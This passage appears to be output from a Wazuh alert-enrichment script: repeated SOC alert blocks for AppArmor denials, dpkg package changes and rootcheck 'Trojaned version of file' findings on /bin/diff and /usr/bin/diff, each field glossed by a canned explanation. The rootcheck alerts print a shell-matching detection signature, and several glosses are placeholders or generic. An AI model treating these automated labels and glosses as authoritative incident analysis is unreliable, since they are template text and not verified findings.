True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.12705
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.576996+00:00 server1 kernel: audit: type=1400 audit(1745533322.575:1030): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/messages/__pycache__/urls.cpython-312.pyc.124504252186160" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.576996+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  17
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.13346
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.541946+00:00 server1 kernel: audit: type=1400 audit(1745533322.540:1027): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/__pycache__/exceptions.cpython-312.pyc.124504253410736" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.541946+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Apparmor DENIED mknod operation.

🧠 What happened? Apparmor DENIED mknod operation.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:02.624+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:02.624+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Apparmor DENIED mknod operation.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  52004
Numeric ID of the detection rule that fired.

rule.firedtimes:  20
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['local', 'syslog', 'apparmor']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.7', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533322.13984
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:22:02.572878+00:00 server1 kernel: audit: type=1400 audit(1745533322.569:1029): apparmor="DENIED" operation="mknod" class="file" profile="ubuntu_pro_esm_cache" name="/usr/lib/python3/dist-packages/uaclient/messages/__pycache__/__init__.cpython-312.pyc.124504252186160" pid=76917 comm="python3" requested_mask="c" denied_mask="c" fsuid=0 ouid=0
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  kernel
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:22:02.572878+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  kernel
Parent decoder used – for nested parsing.

decoder.name:  kernel
Name of the Wazuh decoder that parsed this raw log.

data.status:  DENIED
Result status (success / failure). Quick win to see brute force vs success.

data.extra_data:  mknod
Raw extra block – drill in if the summary is unclear.

location:  /var/log/kern.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Host-based anomaly detection event (rootcheck).

🧠 What happened? Host-based anomaly detection event (rootcheck).

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:03.900+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:03.900+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Host-based anomaly detection event (rootcheck).
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  510
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['ossec', 'rootcheck']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533323.14629
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  Trojaned version of file '/bin/diff' detected. Signature used: 'bash|^/bin/sh|file\.h|proc\.h|/dev/[^n]|^/bin/.*sh' (Generic).
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  rootcheck
Name of the Wazuh decoder that parsed this raw log.

data.title:  Trojaned version of file detected.
Short title some decoders add – usually informational.

data.file:  /bin/diff
Generic file path referenced in the log.

location:  rootcheck
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Host-based anomaly detection event (rootcheck).

🧠 What happened? Host-based anomaly detection event (rootcheck).

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:03.919+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:03.919+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Host-based anomaly detection event (rootcheck).
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  510
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['ossec', 'rootcheck']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533323.15004
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  Trojaned version of file '/usr/bin/diff' detected. Signature used: 'bash|^/bin/sh|file\.h|proc\.h|/dev/[^n]|^/bin/.*sh' (Generic).
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  rootcheck
Name of the Wazuh decoder that parsed this raw log.

data.title:  Trojaned version of file detected.
Short title some decoders add – usually informational.

data.file:  /usr/bin/diff
Generic file path referenced in the log.

location:  rootcheck
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:54.221+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:54.221+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533374.15387
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:22:53 status half-configured linux-libc-dev:amd64 6.8.0-57.59
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-libc-dev
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-57.59
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:54.678+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:54.678+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533374.15874
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:22:54 status half-configured linux-tools-common:all 6.8.0-57.59
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-tools-common
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  all
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-57.59
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:56.222+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:56.222+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533376.16365
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:22:54 status half-configured linux-libc-dev:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-libc-dev
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) installed.

🧠 What happened? New dpkg (Debian Package) installed.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:56.222+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:56.222+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) installed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2902
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533376.16852
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:22:54 status installed linux-libc-dev:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status installed
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-libc-dev
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) installed.

🧠 What happened? New dpkg (Debian Package) installed.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:56.223+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:56.223+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) installed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2902
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533376.17325
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:22:54 status installed linux-tools-common:all 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status installed
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-tools-common
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  all
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:56.223+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:56.223+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533376.17802
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:22:54 status half-configured linux-tools-common:all 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-tools-common
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  all
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:22:56.223+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:22:56.223+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

